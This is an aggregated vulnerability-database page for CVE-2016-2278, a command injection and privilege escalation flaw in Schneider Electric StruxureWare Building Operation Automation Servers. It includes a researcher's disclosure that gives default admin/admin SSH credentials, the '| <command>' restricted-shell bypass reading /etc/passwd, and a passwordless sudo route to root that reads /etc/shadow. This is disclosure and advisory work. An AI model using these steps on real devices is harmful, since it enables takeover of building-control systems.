CVE-2016-2278 (GCVE-0-2016-2278)

Vulnerability from cvelistv5

Published

2016-03-02 11:00

Modified

2024-08-05 23:24

Severity ?

CWE

Summary

References

URL

	Vendor	Product	Version
	n/a	n/a	Version: n/a

var-201603-0043

Vulnerability from variot

Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. A remote attacker can exploit this vulnerability to bypass access control and execute arbitrary OS commands. Weak credential management CVE-ID: None [ Mitre, CVE? ]*

There are two primary users: a. root - password is not set by default - this is a problem as we will see later in the vuln findings - By default, root cannot SSH in. b. admin - default password is 'admin' - Anyone can remotely ssh in to the device using default admin/admin login.

The system / application allows a) weak creds to start with, and more importantly, b) vulnerable versions lacks the mechanism to forcefully have the user change the initial password on first use or later. This has been fixed in the latest version.

2. OS Command Injection

After logging in to the device over SSH, the 'admin' user - the only active, administrative user at this point - is provided a restricted shell (msh), which offers a small set of, application- specific functional options.

$ ssh -l admin Password:

Welcome! (use 'help' to list commands) admin@box:>

admin@box:> release NAME=SE2Linux ID=se2linux PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux) VERSION_ID=0.2.0.212

admin@box:>

admin@box:> help usage: help [command] Type 'help [command]' for help on a specific command.

Available commands: exit - exit this session ps - report a snapshot of the current processes readlog - read log files reboot - reboot the system setip - configure the network interface setlog - configure the logging setsnmp - configure the snmp service setsecurity - configure the security settime - configure the system time top - display Linux tasks uptime - tell how long the system has been running release - tell the os release details

Attempting to run any different command will give an error message.

However, this restricted shell functionality (msh) can be bypassed to execute underlying system commands, by appending '| ' to any of the above set of commands:

admin@box:> uptime | ls bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr etc localization proc share var

admin@box:> uptime | cat /etc/passwd

root:x:0:0:root:/:/bin/sh daemon:x:2:2:daemon:/sbin:/bin/false messagebus:x:3:3:messagebus:/sbin:/bin/false ntp:x:102:102:ntp:/var/empty/ntp:/bin/false sshd:x:103:103:sshd:/var/empty:/bin/false app:x:500:500:Linux Application:/:/bin/false admin:x:1000:1000:Linux User,,,:/:/bin/msh

admin@box:> uptime | cat /etc/group root:x:0: wheel:x:1:admin daemon:x:2: messagebus:x:3: adm:x:5:admin power:x:20:app serial:x:21:app cio:x:22:app lon:x:23:app daemonsv:x:30:admin,app utmp:x:100: lock:x:101: ntp:x:102: sshd:x:103: app:x:500:admin admin:x:1000:admin

3. Privilege Escalation / access to root CVE-ID: None [ Mitre, CVE? ]

Since this is an administrative user, an attacker can exploit OS command injection to perform a variety of tasks from msh shell. But isn’t it better to get a root shell instead.!

As observed from Issue 1 above, root does not have a password set, and it is possible to use 'sudo -i' and become root. Note: sudo is not presented / offered to 'admin' in the set of functional options available thru msh.

admin@box:> sudo -i

We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:

1) Respect the privacy of others.

2) Think before you type.

3) With great power comes great responsibility.

Password:

root@box:~> cat /etc/shadow root:!:16650:0:99999:7::: sshd:!:1:0:99999:7::: admin:$6$:16652:0:99999:7:::

+++++

The Automation Server (AS) is one functional component of the larger, StruxureWare Building Operation platform (SBO) solution / environment. The AS password gets sync’d to SBO application rbac. With the new release, the default AS password will be forcefully changed, and msh has been sufficiently improved to mitigate against command injection.

Issue 3, however, persists. Anyone with access to msh shell, can still drop in to root shell, and have some fun.

+++++

Best Regards, Karn Ganeshen

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201603-0043",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "struxureware building operations automation server as",
        "scope": "lte",
        "trust": 1.8,
        "vendor": "schneider electric",
        "version": "1.7"
      },
      {
        "model": "struxureware building operations automation server as-p",
        "scope": "eq",
        "trust": 1.2,
        "vendor": "schneider electric",
        "version": null
      },
      {
        "model": "struxureware building operations automation server as-p",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "schneider electric",
        "version": "1.7"
      },
      {
        "model": "struxureware building operations automation server as",
        "scope": null,
        "trust": 0.8,
        "vendor": "schneider electric",
        "version": null
      },
      {
        "model": "struxureware building operations automation server as-p",
        "scope": null,
        "trust": 0.8,
        "vendor": "schneider electric",
        "version": null
      },
      {
        "model": "struxureware building operations automation server as-p",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "schneider electric",
        "version": "1.7"
      },
      {
        "model": "electric struxureware building operation application server",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "schneider",
        "version": "\u003c=1.7"
      },
      {
        "model": "struxureware building operations automation server as",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "schneider electric",
        "version": null
      },
      {
        "model": "struxureware building operations automation server as",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "schneider electric",
        "version": "1.7"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "struxureware building operations automation server as",
        "version": "*"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.2,
        "vendor": "struxureware building operations automation server as p",
        "version": "1.7"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/h:schneider_electric:struxureware_building_operations_automation_server_as",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:schneider_electric:struxureware_building_operations_automation_server_as_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/h:schneider_electric:struxureware_building_operations_automation_server_as-p",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:schneider_electric:struxureware_building_operations_automation_server_as-p_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Karn Ganeshen",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "136078"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2016-2278",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "CVE-2016-2278",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2016-01450",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "IVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "5f237420-2351-11e6-abef-000c29c66e3d",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.2,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.9 [IVD]"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "VHN-91097",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "id": "CVE-2016-2278",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2016-2278",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2016-2278",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-01450",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201603-002",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "IVD",
            "id": "5f237420-2351-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-91097",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. A remote attacker can exploit this vulnerability to bypass access control and execute arbitrary OS commands. Weak credential management*\n*CVE-ID:* None *[ Mitre, CVE? ]*\n\nThere are two primary users:\na. root - password is not set by default - this is a problem as we will see\nlater in the vuln findings\n- By default, root cannot SSH in. \nb. admin - default password is \u0027admin\u0027\n- Anyone can remotely ssh in to the device using default admin/admin login. \n\nThe system / application allows a) weak creds to start with, and more\nimportantly, b) vulnerable versions lacks the mechanism to forcefully have\nthe user change the initial password on first use or later. This has been\nfixed in the latest version. \n\n*2. OS Command Injection*\n\nAfter logging in to the device over SSH, the \u0027admin\u0027 user - the only\nactive, administrative user at this point - is provided a restricted shell\n(msh), which offers a small set of, application- specific functional\noptions. \n\n$ ssh \u003cIP\u003e -l admin Password:\n\nWelcome! (use \u0027help\u0027 to list commands) admin@box:\u003e\n\nadmin@box:\u003e release\nNAME=SE2Linux\nID=se2linux\nPRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux)\nVERSION_ID=0.2.0.212\n\nadmin@box:\u003e\n\nadmin@box:\u003e help\nusage: help [command]\nType \u0027help [command]\u0027 for help on a specific command. \n\nAvailable commands:\nexit - exit this session\nps - report a snapshot of the current processes readlog - read log files\nreboot - reboot the system\nsetip - configure the network interface\nsetlog - configure the logging\nsetsnmp - configure the snmp service\nsetsecurity - configure the security\nsettime - configure the system time\ntop - display Linux tasks\nuptime - tell how long the system has been running release - tell the os\nrelease details\n\nAttempting to run any different command will give an error message. \n\nHowever, this restricted shell functionality (msh) can be bypassed to\nexecute underlying system commands, by appending \u0027| \u003ccommand\u003e\u0027 to any of\nthe above set of commands:\n\nadmin@box:\u003e uptime | ls\nbin home lost+found root sys config include mnt run tmp dev lib opt sbin usr\netc localization proc share var\n\nadmin@box:\u003e uptime | cat /etc/passwd\n\nroot:x:0:0:root:/:/bin/sh daemon:x:2:2:daemon:/sbin:/bin/false\nmessagebus:x:3:3:messagebus:/sbin:/bin/false\nntp:x:102:102:ntp:/var/empty/ntp:/bin/false\nsshd:x:103:103:sshd:/var/empty:/bin/false app:x:500:500:Linux\nApplication:/:/bin/false admin:x:1000:1000:Linux User,,,:/:/bin/msh\n\nadmin@box:\u003e uptime | cat /etc/group root:x:0:\nwheel:x:1:admin\ndaemon:x:2:\nmessagebus:x:3:\nadm:x:5:admin\npower:x:20:app\nserial:x:21:app\ncio:x:22:app\nlon:x:23:app\ndaemonsv:x:30:admin,app\nutmp:x:100:\nlock:x:101:\nntp:x:102:\nsshd:x:103:\napp:x:500:admin\nadmin:x:1000:admin\n\n*3. Privilege Escalation / access to root*\n*CVE-ID:* None *[ Mitre, CVE? ]*\n\nSince this is an administrative user, an attacker can exploit OS command\ninjection to perform a variety of tasks from msh shell. But isn\u2019t it better\nto get a root shell instead.!\n\nAs observed from Issue 1 above, root does not have a password set, and it\nis possible to use \u0027sudo -i\u0027 and become root. \nNote: sudo is not presented / offered to \u0027admin\u0027 in the set of functional\noptions available thru msh. \n\nadmin@box:\u003e *sudo -i*\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n#1) Respect the privacy of others. \n#2) Think before you type. \n#3) With great power comes great responsibility. \n\nPassword:\n\n*root@box:~\u003e *cat /etc/shadow\nroot:!:16650:0:99999:7:::\nsshd:!:1:0:99999:7:::\nadmin:$6$\u003chash\u003e:16652:0:99999:7:::\n\n+++++\n\nThe Automation Server (AS) is one functional component of the larger,\nStruxureWare Building Operation platform (SBO) solution / environment. The\nAS password gets sync\u2019d to SBO application rbac. With the new release, the\ndefault AS password will be forcefully changed, and msh has been\nsufficiently improved to mitigate against command injection. \n\nIssue 3, however, persists. Anyone with access to msh shell, can still drop\nin to root shell, and have some fun. \n\n+++++\n-- \nBest Regards,\nKarn Ganeshen\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-2278"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "db": "PACKETSTORM",
        "id": "136078"
      }
    ],
    "trust": 2.52
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-91097",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-2278",
        "trust": 3.3
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-16-061-01",
        "trust": 2.5
      },
      {
        "db": "SCHNEIDER",
        "id": "SEVD-2016-025-01",
        "trust": 1.8
      },
      {
        "db": "EXPLOIT-DB",
        "id": "39522",
        "trust": 1.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002",
        "trust": 0.9
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594",
        "trust": 0.8
      },
      {
        "db": "IVD",
        "id": "5F237420-2351-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "BID",
        "id": "83796",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-91097",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136078",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "PACKETSTORM",
        "id": "136078"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "id": "VAR-201603-0043",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      }
    ],
    "trust": 1.9
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      }
    ]
  },
  "last_update_date": "2024-11-23T23:02:38.400000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SEVD-2016-025-01",
        "trust": 0.8,
        "url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01"
      },
      {
        "title": "Schneider Electric Building Operation Application Server Operating System Command Injection Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/72148"
      },
      {
        "title": "Schneider Electric StruxureWare Building Operation Application Server Fixes for operating system command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=60367"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-284",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-061-01"
      },
      {
        "trust": 1.7,
        "url": "http://download.schneider-electric.com/files?p_doc_ref=sevd-2016-025-01"
      },
      {
        "trust": 1.4,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2278"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/39522/"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2278"
      },
      {
        "trust": 0.1,
        "url": "http://oreo.schneider-electric.com/flipflop/1739415603/index.htm?p_endoctype=technical%20leaflet\u0026p_reference=sevd-2016-025-01\u0026p_file_name=sevd-2016-025-01%20sbo%20as.pdf\u0026flipflop=1#/2"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "PACKETSTORM",
        "id": "136078"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "db": "PACKETSTORM",
        "id": "136078"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-03-04T00:00:00",
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "date": "2016-03-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "date": "2016-03-02T00:00:00",
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "date": "2016-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "date": "2016-03-04T00:41:39",
        "db": "PACKETSTORM",
        "id": "136078"
      },
      {
        "date": "2016-03-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      },
      {
        "date": "2016-03-02T11:59:02.600000",
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-03-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      },
      {
        "date": "2018-10-30T00:00:00",
        "db": "VULHUB",
        "id": "VHN-91097"
      },
      {
        "date": "2016-03-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-001594"
      },
      {
        "date": "2016-03-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      },
      {
        "date": "2024-11-21T02:48:07.730000",
        "db": "NVD",
        "id": "CVE-2016-2278"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Schneider Electric Building Operation Application Server Operating system command injection vulnerability",
    "sources": [
      {
        "db": "IVD",
        "id": "5f237420-2351-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01450"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201603-002"
      }
    ],
    "trust": 0.6
  }
}

ghsa-5242-5wvm-8m3p

Vulnerability from github

Published

2022-05-14 02:03

Modified

2025-04-12 12:57

Severity ?

7.2 (High) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2016-2278"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-03-02T11:59:00Z",
    "severity": "HIGH"
  },
  "details": "Schneider Electric Struxureware Building Operations Automation Server AS 1.7 and earlier and AS-P 1.7 and earlier allows remote authenticated administrators to execute arbitrary OS commands by defeating an msh (aka Minimal Shell) protection mechanism.",
  "id": "GHSA-5242-5wvm-8m3p",
  "modified": "2025-04-12T12:57:24Z",
  "published": "2022-05-14T02:03:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2278"
    },
    {
      "type": "WEB",
      "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/39522"
    },
    {
      "type": "WEB",
      "url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2016-025-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

cnvd-2016-01450

Vulnerability from cnvd

Title

Schneider Electric Building Operation Application Server操作系统命令注入漏洞

Description

